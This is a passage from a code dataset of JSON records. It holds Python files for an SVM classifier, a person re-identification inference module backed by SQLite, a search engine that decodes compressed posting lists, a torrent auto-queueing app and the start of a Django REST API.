"usage_type": "name"}, {"api_name": "logging.info", "line_number": 73, "usage_type": "call"}, {"api_name": "vts.runners.host.const.EXIT_CODE", "line_number": 73, "usage_type": "attribute"}, {"api_name": "vts.runners.host.const", "line_number": 73, "usage_type": "name"}, {"api_name": "vts.runners.host.asserts.assertFalse", "line_number": 74, "usage_type": "call"}, {"api_name": "vts.runners.host.asserts", "line_number": 74, "usage_type": "name"}, {"api_name": "vts.runners.host.const.EXIT_CODE", "line_number": 75, "usage_type": "attribute"}, {"api_name": "vts.runners.host.const", "line_number": 75, "usage_type": "name"}, {"api_name": "vts.runners.host.test_runner.main", "line_number": 79, "usage_type": "call"}, {"api_name": "vts.runners.host.test_runner", "line_number": 79, "usage_type": "name"}]} +{"seq_id": "324383740", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 2 13:40:11 2017\n\n@author: heisenberg\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef load_dataset():\n global dataset, X, Y\n dataset = pd.read_csv(\"Social_Network_Ads.csv\")\n X = dataset.iloc[:,2:4].values\n Y = dataset.iloc[:,-1].values\n \ndef scale_data():\n global X\n from sklearn.preprocessing import StandardScaler\n sc_x = StandardScaler()\n sc_x.fit(X)\n X=sc_x.transform(X)\n \ndef split_train_test():\n global x_train, x_test, y_test, y_train\n from sklearn.model_selection import train_test_split\n x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.2)\n \ndef create_train_model():\n global classifier\n from sklearn.svm import SVC\n classifier = SVC(kernel = 'linear')\n classifier.fit(x_train,y_train)\n \ndef predict_values():\n global y_pred\n y_pred = classifier.predict(x_test)\n \ndef analyse_confusion_matrix():\n from sklearn.metrics import confusion_matrix\n cm = confusion_matrix(y_test, y_pred)\n print(cm)\n \ndef plot_graph():\n from matplotlib.colors import ListedColormap\n global X1, X2\n x_set, y_set = x_train, y_train\n X1, X2 = np.meshgrid(np.arange(start = min(x_set[:,0])-1, stop = max(x_set[:,1])+1, step = 0.01),\n np.arange(start = min(x_set[:,1])-1, stop = max(x_set[:,1])+1, step = 0.01))\n plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(),X2.ravel()]).T).reshape(X1.shape),\n alpha = 0.75, cmap = ListedColormap(('red','green')))\n plt.xlim(X1.min(), X1.max())\n plt.ylim(X2.min(), X2.max())\n for i,j in enumerate(np.unique(y_set)):\n plt.scatter(x_set[y_set==j,0], x_set[y_set==j,1], \n c=ListedColormap(('red','green'))(i), label=j)\n plt.title(\"SVM Classification with RBF kernel\")\n plt.xlabel(\"Age\")\n plt.ylabel(\"Salary\")\n plt.legend()\n \nload_dataset()\nscale_data()\nsplit_train_test()\ncreate_train_model()\npredict_values()\nanalyse_confusion_matrix()\nplot_graph()", "sub_path": "SVM classifier/support_vector_classifier.py", "file_name": "support_vector_classifier.py", "file_ext": "py", "file_size_in_byte": 2085, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contourf", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}]} +{"seq_id": "273947999", "text": "import torch\nimport os\nimport numpy as np\nimport cv2\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom .config import Config\nfrom .utils.to_sqlite import insert_vector_db, insert_human_db, insert_infer_db, load_gallery_from_db, convertToBinaryData, load_human_db, convertImgtoBlob, convertBlobtoIMG\nfrom .utils.reranking import re_ranking\n\nfrom .model import make_model\nfrom torch.backends import cudnn\nimport torchvision.transforms as T\nfrom .utils.metrics import cosine_similarity, euclidean_distance\nimport pickle\n\n\nclass reid_inference:\n \"\"\"Reid Inference class.\n \"\"\"\n\n def __init__(self):\n cudnn.benchmark = True\n self.Cfg = Config()\n self.model = make_model(self.Cfg, 255)\n self.model.load_param(self.Cfg.TEST_WEIGHT)\n self.model = self.model.to('cuda')\n self.transform = T.Compose([\n T.Resize(self.Cfg.INPUT_SIZE),\n T.ToTensor(),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n print(f'Model loaded with weight from {self.Cfg.TEST_WEIGHT}')\n self.model.eval()\n print('Ready to Eval')\n print('Loading from DB...')\n self.all_img_id, self.all_patch_img, self.all_gal_feat = load_gallery_from_db() #load from vectorkb_table\n self.human_dict = load_human_db()\n self._tmp_img = \"\"\n self._tmp_galfeat = \"\"\n print('Data loaded. You can start infer an image using to_gallery_feat --> query_feat --> infer')\n \n\n\n def to_gallery_feat(self, image_patch_or_path, flip=True, norm=True):\n \"\"\"\n Use to build gallery feat on images picked from Deep Sort.\n This is different from normal query feature extraction as this has flipped & normed feature,\n to improve the matching precision.\n Takes image path or PIL image directly.\n To be combined with INFER function at the end of troubleshooting\n \"\"\"\n if type(image_patch_or_path) is str:\n query_img = Image.open(image_patch_or_path)\n else:\n query_img = image_patch_or_path\n \n input = torch.unsqueeze(self.transform(query_img), 0)\n input = input.to('cuda')\n with torch.no_grad():\n if flip:\n gal_feat = torch.FloatTensor(input.size(0), 2048).zero_().cuda()\n for i in range(2):\n if i == 1:\n inv_idx = torch.arange(input.size(3) - 1, -1, -1).long().cuda()\n input = input.index_select(3, inv_idx)\n f = self.model(input)\n gal_feat = gal_feat + f\n else:\n gal_feat = self.model(input)\n\n if norm:\n gal_feat = torch.nn.functional.normalize(gal_feat, dim=1, p=2)\n\n self._tmp_img = query_img #temp save PIL image here\n self._tmp_galfeat = gal_feat #temp save gal_feat here\n return gal_feat\n\n\n\n\n def to_query_feat(self, image_patch_or_path):\n \"\"\"\n image - input image path.\n for finding query feature, no flipping and normalization is done.\n This function returns feature (1,2048) tensor.\n\n \"\"\"\n if type(image_patch_or_path) is str:\n query_img = Image.open(image_patch_or_path)\n else:\n query_img = image_patch_or_path\n\n input = torch.unsqueeze(self.transform(query_img), 0)\n input = input.to('cuda')\n with torch.no_grad():\n query_feat = self.model(input)\n return query_feat\n\n\n\n def infer(self, query_feat, query_img_id, top_k= 3, reranking=True):\n if len(self.all_gal_feat)>0:\n # if reranking:\n # dist_mat = 1 - re_ranking(query_feat, self.all_gal_feat, k1=30, k2=10, lambda_value=0.2)[0]\n # indices = np.argsort(dist_mat)[::-1]\n\n # else:\n dist_mat = torch.nn.functional.cosine_similarity(query_feat, self.all_gal_feat).cpu().numpy()\n indices = np.argsort(dist_mat)[::-1][:50] #to test if use 50 or use all better\n\n #do reranking\n if reranking:\n candidate_gal_feat = torch.index_select(self.all_gal_feat, 0, torch.tensor([indices]).cuda()[0])\n rerank_dist = re_ranking(query_feat, candidate_gal_feat, k1=30, k2=6, lambda_value=0.3)[0]\n rerank_idx = np.argsort(1-rerank_dist)[::-1]\n indices = np.array([indices[i] for i in rerank_idx])\n \n #if match found --> insert to human_table, need a human list too. make it into class\n #if no match found --> insert new identity to human_table.\n if dist_mat[indices[0]] >= self.Cfg.THRESHOLD:\n\n \n #match found\n matched_img_id = self.all_img_id[indices[0]]\n identity = self.human_dict[matched_img_id]\n print(f\"Match found! Identity is {identity}\")\n\n #insert to human_table & dict\n insert_human_db(query_img_id, identity, \"Matched\")\n self.human_dict[query_img_id] = identity\n\n #insert query image to gallery table & list. Recalling we have self.tmp variables\n query_img_blob = convertImgtoBlob(self._tmp_img)\n insert_vector_db(query_img_id, query_img_blob, pickle.dumps(self._tmp_galfeat) ) \n\n #insert to record table\n record = [query_img_id , query_img_blob]\n for k in range(top_k):\n try:\n record.append(self.all_img_id[indices[k]])\n record.append(convertImgtoBlob(self.all_patch_img[indices[k]]))\n record.append(dist_mat.item(indices[k]))\n except:\n record.append(None)\n record.append(None)\n record.append(None)\n insert_infer_db(record)\n\n\n elif (len(indices)>= 2) and (dist_mat[indices[1]] >= 0.75):\n #match found\n matched_img_id = self.all_img_id[indices[1]]\n identity = self.human_dict[matched_img_id]\n print(f\"Match found! Identity is {identity} --> SECOND MATCH\")\n\n #insert to human_table & dict\n insert_human_db(query_img_id, identity, \"Matched\")\n self.human_dict[query_img_id] = identity\n\n #insert query image to gallery table & list. Recalling we have self.tmp variables\n query_img_blob = convertImgtoBlob(self._tmp_img)\n insert_vector_db(query_img_id, query_img_blob, pickle.dumps(self._tmp_galfeat) ) \n\n #insert to record table\n record = [query_img_id , query_img_blob]\n for k in range(top_k):\n try:\n record.append(self.all_img_id[indices[k+1]])\n record.append(convertImgtoBlob(self.all_patch_img[indices[k+1]]))\n record.append(dist_mat.item(indices[k+1]))\n except:\n record.append(None)\n record.append(None)\n record.append(None)\n insert_infer_db(record)\n\n else:\n #no match found\n new_identity = str(max(map(int, self.human_dict.values()))+1)\n print(f\"No match found! Creating new identity -- {new_identity}\")\n\n #insert to human_table & dict\n insert_human_db(query_img_id, new_identity, \"New\")\n self.human_dict[query_img_id] = new_identity\n\n #insert query image to gallery table & list. Recalling we have self.tmp variables\n query_img_blob = convertImgtoBlob(self._tmp_img)\n insert_vector_db(query_img_id, query_img_blob, pickle.dumps(self._tmp_galfeat) ) \n\n #insert to record table\n record = [query_img_id , query_img_blob]\n for k in range(top_k):\n record.append(None)\n try:\n record.append(convertImgtoBlob(self.all_patch_img[indices[k]]))\n record.append(dist_mat.item(indices[k]))\n except:\n record.append(None)\n record.append(None)\n insert_infer_db(record)\n\n #Putting these records into memory database\n self.all_img_id.append(query_img_id)\n self.all_patch_img.append(self._tmp_img)\n self.all_gal_feat = torch.cat([self.all_gal_feat, self._tmp_galfeat])\n\n \n else:\n #new record\n new_identity = str(1)\n print(f\"No match found! Creating new identity -- {new_identity}\")\n\n #insert to human_table & dict\n insert_human_db(query_img_id, new_identity, \"New\")\n self.human_dict[query_img_id] = new_identity\n\n #insert query image to gallery table & list. Recalling we have self.tmp variables\n query_img_blob = convertImgtoBlob(self._tmp_img)\n insert_vector_db(query_img_id, query_img_blob, pickle.dumps(self._tmp_galfeat) ) \n\n #insert to record table\n record = [query_img_id , query_img_blob]\n for k in range(top_k):\n record.append(None)\n record.append(None)\n record.append(None)\n insert_infer_db(record)\n\n #Putting these records into memory database\n self.all_img_id.append(query_img_id)\n self.all_patch_img.append(self._tmp_img)\n self.all_gal_feat = torch.cat([self.all_gal_feat, self._tmp_galfeat])\n\n\n\n\n\n\n\n \n # def build_all_gallery(dir_to_gal_folder = self.Cfg.GALLERY_DIR, to_db = False):\n # \"\"\"\n # TAKE NOTEE!! TO BE MODIFIED AS WE NO LONGER NEED TO MASS UPLOAD FROM\n # IMG FILE TO GALLERY DB.\n # \"\"\"\n # all_gal_feat = []\n # all_img_id = os.listdir(dir_to_gal_folder) #this is id rather than path\n\n # db_feat = []\n # db_img = []\n\n # print(f'Building gallery from {dir_to_gal_folder}...')\n # for img in all_img_id:\n # gal_feat = to_gallery_feat(dir_to_gal_folder + \"/\" + img)\n # all_gal_feat.append(gal_feat)\n # db_feat.append(pickle.dumps(gal_feat))\n # db_img.append(convertToBinaryData(dir_to_gal_folder + \"/\" + img))\n\n # all_gal_feat = torch.cat(all_gal_feat, dim=0)\n\n # if to_db:\n # db_img_path = [dir_to_gal_folder + \"/\" + img for img in all_img_id]\n # db_humam_id = [img.split('_')[0] for img in all_img_id]\n # insert_vector_db(all_img_id, db_img_path, db_img, db_feat)\n # insert_human_db(all_img_id, db_humam_id)\n # print('All gallery uploaded to DB.')\n # else:\n # return all_gal_feat, all_img_id\n\n # UNSUPPORTED\n # plt.subplot(1, top_k+2, 1)\n # plt.title('Query')\n # plt.axis('off')\n # query_img = Image.open(query_img_path)\n # plt.imshow(np.asarray(query_img))\n\n # for k in range(top_k):\n # plt.subplot(1, top_k+2, k+3)\n # name = str(indices[k]) + '\\n' + '{0:.2f}'.format(dist_mat[indices[k]])\n # img = np.asarray(Image.open(self.all_img_path[indices[k]]))\n # plt.title(name)\n # plt.axis('off')\n # plt.imshow(img)\n # plt.show()", "sub_path": "human_tracker/reid/inference.py", "file_name": "inference.py", "file_ext": "py", "file_size_in_byte": 11717, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.backends.cudnn.benchmark", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 23, "usage_type": "name"}, {"api_name": "config.Config", "line_number": 24, "usage_type": "call"}, {"api_name": "model.make_model", "line_number": 25, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 28, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 28, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 29, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 29, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 30, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 30, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 31, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 31, "usage_type": "name"}, {"api_name": "utils.to_sqlite.load_gallery_from_db", "line_number": 37, "usage_type": "call"}, {"api_name": "utils.to_sqlite.load_human_db", "line_number": 38, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.unsqueeze", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 90, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 90, "usage_type": "name"}, {"api_name": "torch.unsqueeze", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.nn.functional.cosine_similarity", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 114, "usage_type": "call"}, {"api_name": "utils.reranking.re_ranking", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_human_db", "line_number": 130, "usage_type": "call"}, {"api_name": "utils.to_sqlite.convertImgtoBlob", "line_number": 134, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_vector_db", "line_number": 135, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 135, "usage_type": "call"}, {"api_name": "utils.to_sqlite.convertImgtoBlob", "line_number": 142, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_infer_db", "line_number": 148, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_human_db", "line_number": 158, "usage_type": "call"}, {"api_name": "utils.to_sqlite.convertImgtoBlob", "line_number": 162, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_vector_db", "line_number": 163, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 163, "usage_type": "call"}, {"api_name": "utils.to_sqlite.convertImgtoBlob", "line_number": 170, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_infer_db", "line_number": 176, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_human_db", "line_number": 184, "usage_type": "call"}, {"api_name": "utils.to_sqlite.convertImgtoBlob", "line_number": 188, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_vector_db", "line_number": 189, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 189, "usage_type": "call"}, {"api_name": "utils.to_sqlite.convertImgtoBlob", "line_number": 196, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_infer_db", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 206, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_human_db", "line_number": 215, "usage_type": "call"}, {"api_name": "utils.to_sqlite.convertImgtoBlob", "line_number": 219, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_vector_db", "line_number": 220, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 220, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_infer_db", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 233, "usage_type": "call"}]} +{"seq_id": "326427768", "text": "from bs4 import BeautifulSoup\nfrom PorterStemmer import PorterStemmer\nfrom collections import defaultdict\nimport snappy\nimport sys\nimport json\nimport re\nimport os\nimport string\nimport time\n\ndef c5_decode(x):\n pl=[]\n i = 0\n b = 0\n k = 0\n while(True):\n byte = x[i:i+8]\n readByte = int(byte, 2)\n i+=8\n if(readByte<128):\n b = b*128 + readByte\n break\n else:\n b = b*128 + (readByte-128)\n while(True):\n byte = x[i:i+8]\n readByte = int(byte, 2)\n i+=8\n if(readByte<128):\n k = k*128 + readByte\n break\n else:\n k = k*128 + (readByte-128)\n if(k==2):\n return pl\n while(i+k<=len(x)):\n block = x[i:i+k]\n i+=k\n block_val = int(block, 2)\n if(block_val == (2**k - 1)):\n break\n else: \n pl.append(b+block_val)\n excess_element = 0\n while(i+8<=len(x)):\n byte = x[i:i+8]\n readByte = int(byte, 2)\n i+=8\n if(readByte<128):\n excess_element = excess_element*128 + readByte\n pl.append(excess_element)\n excess_element = 0\n else:\n excess_element = excess_element*128 + (readByte-128)\n return pl\n\ndef create_lists_to_intersect(c_no, query, indexfile):\n lists_to_intersect = []\n for term in query:\n term_list = []\n if term not in offsetAndLength:\n term_list=[]\n lists_to_intersect.append(term_list)\n elif(c_no==0):\n offset = offsetAndLength[term][0]\n with open(indexfile, \"rb\") as f:\n f.seek(offset)\n encoded = f.read(offsetAndLength[term][1])\n encoded = encoded.decode('utf8')\n term_list = encoded.split(',')\n term_list = [int(ele) for ele in term_list]\n lists_to_intersect.append(term_list)\n elif(c_no==1):\n offset = offsetAndLength[term][0]\n with open(indexfile, \"rb\") as f:\n decoded = 0\n totalDecoded = 0\n f.seek(offset)\n while(totalDecoded=offsetAndLength[term][1]*8):\n break\n if(j>=offsetAndLength[term][1]*8 and uncomp[-1]=='1'):\n break\n j+=1\n c_len+=1\n llx=c_len\n lx=1\n for _ in range(0,llx-1):\n bit = int(uncomp[j])\n lx = lx*2 + bit\n j = j+1\n x = 1\n for _ in range(lx-1):\n bit = int(uncomp[j])\n x = x*2 + bit\n j = j+1\n term_list.append(x) \n lists_to_intersect.append(term_list)\n elif(c_no==3):\n offset = offsetAndLength[term][0]\n with open(indexfile, \"rb\") as f:\n f.seek(offset)\n comp = f.read(offsetAndLength[term][1])\n uncomp = snappy.uncompress(comp)\n strList1 = uncomp.decode()\n strList1 = strList1.split(',')\n term_list = [int(ele) for ele in strList1]\n lists_to_intersect.append(term_list)\n elif(c_no==4 or c_no>5 or c_no<0):\n print('not implemented')\n exit()\n elif(c_no==5):\n offset = offsetAndLength[term][0]\n with open(indexfile, \"rb\") as f:\n f.seek(offset)\n comp = list(f.read(offsetAndLength[term][1]))\n comp = ''.join(['{0:08b}'.format(x) for x in comp])\n uncomp = c5_decode(comp)\n lists_to_intersect.append(uncomp)\n return sorted(lists_to_intersect, key=len)\n\n\n\nif __name__ == '__main__':\n start = time.time()\n queryfile = sys.argv[1]\n resultfile = sys.argv[2]\n indexfile = sys.argv[3]\n dictfile = sys.argv[4]\n c_no = -1\n\n exclist = ',.:;\"(){}[]\\n`\\''\n table = str.maketrans(exclist, ' '*len(exclist), '')\n\n f = open(dictfile, 'r')\n offsetAndLength = json.load(f)\n docId = {}\n docId = offsetAndLength['DocIdMapLength']\n f.close()\n\n stopwords = set()\n with open(indexfile, \"rb\") as f:\n c_no = f.read(1)\n c_no = int.from_bytes(c_no, sys.byteorder)\n\n\n if(c_no==-1):\n print('not_implemented')\n exit()\n \n ps = PorterStemmer()\n\n queries = []\n with open(queryfile, 'r') as f:\n for line in f:\n temp = line.rstrip()\n tempList = temp = temp.translate(str.maketrans(table)).split()\n if(len(tempList)>0):\n queries.append(tempList)\n for query in queries:\n for i in range(0, len(query)):\n query[i] = ps.stem(query[i].lower(), 0, len(query[i])-1)\n qCounter = 0\n # print(queries)\n with open(resultfile,'w') as f:\n f.truncate(0)\n for query in queries:\n lists_to_intersect = create_lists_to_intersect(c_no, query, indexfile) \n f1 = open(resultfile, 'a') \n result = []\n if(len(lists_to_intersect)>0):\n result = lists_to_intersect[0]\n else: \n result = []\n continue \n for list_no in range(1, len(lists_to_intersect)): \n newResult=[] \n len1 = len(result)\n len2 = len(lists_to_intersect[list_no])\n i = 0\n j = 0\n t1 = 0\n t2 = 0\n lastEle = 0\n if(len1>0):\n t1=result[0]\n else:\n result=[]\n break\n if(len2>0):\n t2=lists_to_intersect[list_no][0]\n else: \n result=[]\n break\n while(i= int(min_) * 1024*1024)\n if max_.isnumeric():\n q = q.filter(Torrent.size <= int(max_) * 1024*1024)\n\n accepted[filter_name] = []\n for row in q.all():\n if regex and not re.search(regex, row.name, re.IGNORECASE):\n continue\n\n accepted[filter_name].append(row)\n\n return accepted\n\n @withconfig\n def run(self, db_shell=False, dry_run=False, settings=None):\n if db_shell:\n return self.run_db_session()\n\n self.sync_states(dry_run)\n\n accepted = self.filter(settings)\n if accepted and not dry_run:\n for t_obj in itertools.chain.from_iterable(accepted.values()):\n self.queue_torrent(t_obj)\n\n for (f, accepted) in accepted.items():\n if len(accepted) == 1:\n notify(msg=\"Accepted %s item: %s\" % (f, accepted[0].name))\n if len(accepted) > 1:\n notify(msg=\"Accepted %s items for %s\" % (len(accepted), f))\n", "sub_path": "zizi/apps/bypass/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 5633, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "zizi.core.pkgmng.argument", "line_number": 18, "usage_type": "call"}, {"api_name": "zizi.core.pkgmng.argument", "line_number": 23, "usage_type": "call"}, {"api_name": "zizi.core.db.create_session", "line_number": 30, "usage_type": "call"}, {"api_name": "zizi.apps.torrentspider.store.dbpath", "line_number": 30, "usage_type": "name"}, {"api_name": "zizi.apps.bypass.backend.TransmissionBackend", "line_number": 31, "usage_type": "call"}, {"api_name": "zizi.extras.logging.get_logger", "line_number": 32, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pdb.set_trace", "line_number": 56, "usage_type": "call"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 61, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 61, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 66, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 66, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 67, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 67, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 68, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 68, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 69, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 69, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 70, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 70, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 73, "usage_type": "argument"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.state.in_", "line_number": 74, "usage_type": "call"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.state", "line_number": 74, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 74, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 74, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 88, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 88, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 108, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 108, "usage_type": "name"}, {"api_name": "zizi.extras.notifications.notify", "line_number": 109, "usage_type": "call"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 131, "usage_type": "argument"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.state", "line_number": 131, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 131, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.name.like", "line_number": 134, "usage_type": "call"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.name", "line_number": 134, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 134, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.type.in_", "line_number": 137, "usage_type": "call"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.type", "line_number": 137, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 137, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.language.in_", "line_number": 140, "usage_type": "call"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.language", "line_number": 140, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 140, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.size", "line_number": 146, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 146, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.size", "line_number": 148, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 148, "usage_type": "name"}, {"api_name": "re.search", "line_number": 152, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 152, "usage_type": "attribute"}, {"api_name": "itertools.chain.from_iterable", "line_number": 168, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 168, "usage_type": "attribute"}, {"api_name": "zizi.extras.notifications.notify", "line_number": 173, "usage_type": "call"}, {"api_name": "zizi.extras.notifications.notify", "line_number": 175, "usage_type": "call"}, {"api_name": "zizi.core.misc.withconfig", "line_number": 159, "usage_type": "name"}]} +{"seq_id": "466290066", "text": "from django.http import (\n HttpResponse,\n Http404\n)\nfrom rest_framework import generics\nfrom rest_framework.renderers import JSONRenderer\n\nfrom extras.models import (\n Category,\n Item\n)\nfrom extras.api.serializers import (\n CategorySerializer,\n ItemSerializer,\n)\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders content into JSON.\n \"\"\"\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n\n\nclass CategoryList(generics.ListAPIView):\n \"\"\"\n Returns a list of all categories.\n \"\"\"\n model = Category\n serializer_class = CategorySerializer\n\n def get_queryset(self):\n \"\"\"\n Get the categories\n \"\"\"\n categories = Category.objects.all()\n\n return categories\n\n\nclass ItemList(generics.ListAPIView):\n \"\"\"\n Returns a list 